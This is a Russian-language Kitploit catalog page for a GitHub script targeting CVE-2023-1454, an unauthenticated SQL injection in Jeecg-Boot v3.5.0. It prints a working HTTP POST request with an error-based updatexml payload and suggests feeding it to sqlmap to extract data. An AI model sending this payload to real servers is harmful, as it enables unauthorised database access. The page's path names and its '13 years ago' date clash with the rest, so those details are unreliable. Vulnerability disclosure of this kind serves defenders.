Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-1454 — CVE-2023-1454漏洞检测脚本 | Kitploit
Инструменты/GitHubGitHub/bugfor-pings/cve-2023-1454
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubbugfor-pings/cve-2023-1454

CVE-2023-1454

CVE-2023-1454漏洞检测脚本

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-1454

Сценарий обнаружения уязвимости CVE-2023-1454

Данный материал предоставлен только для ознакомления. Несанкционированное использование технической информации и инструментов, описанных в статье, для вторжения в любые компьютерные системы запрещено. Автор не несет ответственности за прямые или косвенные последствия и убытки, возникшие в результате использования предоставленной информации.

Краткое введение Jeecg-Boot — это низкокодовая платформа разработки на основе генератора кода. Она предоставляет ряд функций, таких как генераторы кода, шаблонизаторы, управление разрешениями, словари данных, импорт/экспорт данных и т. д., что помогает разработчикам быстро создавать корпоративные приложения.

Обзор уязвимости Java-низкокодовая платформа корпоративных веб-приложений Jeecg-Boot (v3.5.0) использует jimureport-spring-boot-starter-1.5.6.jar. В Jeecg-Boot имеется дефект фильтрации специальных символов. В версии v3.5.0 с фронтендом на Vue3 существует неавторизованная SQL-инъекция. Точка уязвимости находится в пути /querySql: при вызове SQL-запроса параметр id не обрабатывается, что позволяет напрямую выполнять инъекцию с выводом ошибок. Неавторизованный удаленный злоумышленник, конструируя специальную строку, может получить конфиденциальную информацию из целевой базы данных.

Затрагиваемые версии Затронутая версия: Jeecg-Boot = v3.5.0

Сохраните пакет данных в txt и используйте sqlmap для получения данных

root@kitploit:~
POST /jmreport/qurestSql HTTP/1.1
    Host: xxx.xxx.xxx
    Content-Length: 0
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    
   {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

Скачать инструмент